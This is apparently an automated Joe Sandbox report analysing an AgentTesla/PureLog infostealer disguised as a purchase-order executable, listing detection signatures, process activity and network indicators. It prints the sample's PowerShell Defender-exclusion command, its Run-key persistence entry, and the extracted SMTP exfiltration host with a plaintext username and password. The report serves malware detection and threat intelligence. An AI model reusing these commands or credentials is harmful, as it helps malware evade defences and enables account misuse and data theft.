Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe

Overview

General Information

Sample name:PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
renamed because original name is a hash value
Original sample name:PR 2500006515 972 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Analysis ID:1520405
MD5:0362b41458cd2b19f542e3f3f040c547
SHA1:210e4b23a4ceba122fb66f6c0ed92a534c852b57
SHA256:f3dd8124dc20b5dbe2afde3eaa092c05e1eb0fae8fe16aaacfa9e0d5213f4117
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ctsdvwT.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
    • ctsdvwT.exe (PID: 3684 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
  • ctsdvwT.exe (PID: 6840 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
    • ctsdvwT.exe (PID: 1016 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
    • ctsdvwT.exe (PID: 2676 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.yildiztepeenerji.com.tr", "Username": "muhasebe@yildiztepeenerji.com.tr", "Password": "na1tyYbc3"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              5.2.ctsdvwT.exe.2cc398c.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    6.2.ctsdvwT.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 34 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", ParentImage: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ParentProcessId: 6752, ParentProcessName: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", ProcessId: 6980, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", ParentImage: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ParentProcessId: 6752, ParentProcessName: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", ProcessId: 6980, ProcessName: powershell.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.245.148.65, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, Initiated: true, ProcessId: 7128, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50358
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", ParentImage: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ParentProcessId: 6752, ParentProcessName: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe", ProcessId: 6980, ProcessName: powershell.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 6.2.ctsdvwT.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.yildiztepeenerji.com.tr", "Username": "muhasebe@yildiztepeenerji.com.tr", "Password": "na1tyYbc3"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeReversingLabs: Detection: 71%
                      Multi AV Scanner detection for submitted file
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeReversingLabs: Detection: 71%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeJoe Sandbox ML: detected
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer325DA9 source: powershell.exe, 00000001.00000002.1778310849.0000000007981000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1777916558.0000000007926000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: LrBtUp.pdb source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
                      Source: Binary string: LrBtUp.pdbSHA256 source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbd source: powershell.exe, 00000001.00000002.1780173033.0000000008832000.00000004.00000020.00020000.00000000.sdmp
                      Source: global trafficTCP traffic: 192.168.2.4:50358 -> 77.245.148.65:587
                      Source: Joe Sandbox ViewASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
                      Source: global trafficTCP traffic: 192.168.2.4:50358 -> 77.245.148.65:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: 26.165.165.52.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: mail.yildiztepeenerji.com.tr
                      Source: global trafficDNS traffic detected: DNS query: _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002BA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.yildiztepeenerji.com.tr
                      Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1867946503.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1948373451.0000000002A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, R1W.cs.Net Code: uBa63eXnQW
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, R1W.cs.Net Code: uBa63eXnQW
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C6EE00 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,000000006_2_05C6EE00
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 0_2_0127DC7C0_2_0127DC7C
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_00EC97604_2_00EC9760
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_00ECC9D84_2_00ECC9D8
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_00EC4AA84_2_00EC4AA8
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_00EC3E904_2_00EC3E90
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_00EC41D84_2_00EC41D8
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_00ECE76F4_2_00ECE76F
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_05686E054_2_05686E05
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_056817684_2_05681768
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_056881084_2_05688108
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_056881024_2_05688102
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_05688DD04_2_05688DD0
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_05682F104_2_05682F10
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_056809C04_2_056809C0
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 4_2_056828284_2_05682828
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 5_2_02C8DC7C5_2_02C8DC7C
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026F96386_2_026F9638
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026F4AA86_2_026F4AA8
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026FC8B06_2_026FC8B0
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026F8E786_2_026F8E78
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026F3E906_2_026F3E90
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026F41D86_2_026F41D8
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C604486_2_05C60448
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C611F06_2_05C611F0
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C62D986_2_05C62D98
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C622B06_2_05C622B0
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C67F886_2_05C67F88
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_05C67F206_2_05C67F20
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_026FAF6F6_2_026FAF6F
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0100DC7C10_2_0100DC7C
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_0308963812_2_03089638
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_03084AA812_2_03084AA8
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_0308C8B012_2_0308C8B0
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_03083E9012_2_03083E90
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_030841D812_2_030841D8
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B044812_2_068B0448
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B11F012_2_068B11F0
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B6C5C12_2_068B6C5C
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B2D9812_2_068B2D98
